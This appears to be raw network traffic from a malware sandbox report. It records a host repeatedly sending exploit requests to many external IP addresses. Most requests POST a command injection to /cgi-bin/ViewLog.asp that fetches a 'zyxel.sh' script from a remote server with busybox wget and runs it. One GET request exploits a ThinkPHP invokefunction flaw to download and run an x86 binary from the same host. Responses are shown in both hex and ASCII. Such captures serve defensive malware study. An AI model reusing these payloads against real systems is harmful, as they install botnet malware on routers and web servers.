                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        149192.168.2.144670495.154.86.2418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.909096003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:12.251574039 CET1254INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: ru
                                                        Content-Length: 1117
                                                        Date: Wed, 14 Feb 2024 08:33:12 GMT
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 32 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="ru"><head><title>HTTP Status 404 </title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 </h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.20</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        150192.168.2.143927495.182.31.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.022280931 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:12.254189014 CET313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        151192.168.2.144754694.121.101.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.052194118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        152192.168.2.144458294.121.71.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.052416086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        153192.168.2.145123294.120.30.1618080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.054311991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        154192.168.2.144121494.69.226.1368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.057293892 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:12.306474924 CET388INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 10:33:10 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        155192.168.2.145753094.46.180.1878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.345726013 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:12.558145046 CET510INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:16:09 GMT
                                                        Server: Apache
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 301 Moved Permanentlyerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        156192.168.2.143290485.74.91.458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.484165907 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:12.728249073 CET388INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 10:33:12 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        157192.168.2.143945294.122.25.358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.493491888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        158192.168.2.143334894.70.64.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.495069027 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:12.742799044 CET411INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 10:33:11 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        159192.168.2.146065862.29.2.2528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.495507002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        160192.168.2.143679494.121.124.1878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.495589972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        161192.168.2.143539495.86.110.1458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.500539064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        162192.168.2.143443694.187.99.498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.502737999 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        163192.168.2.145550088.99.171.6980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:12.980813980 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:13.189111948 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        164192.168.2.145493488.221.230.9880
                                                        TimestampBytes transferredDirectionData
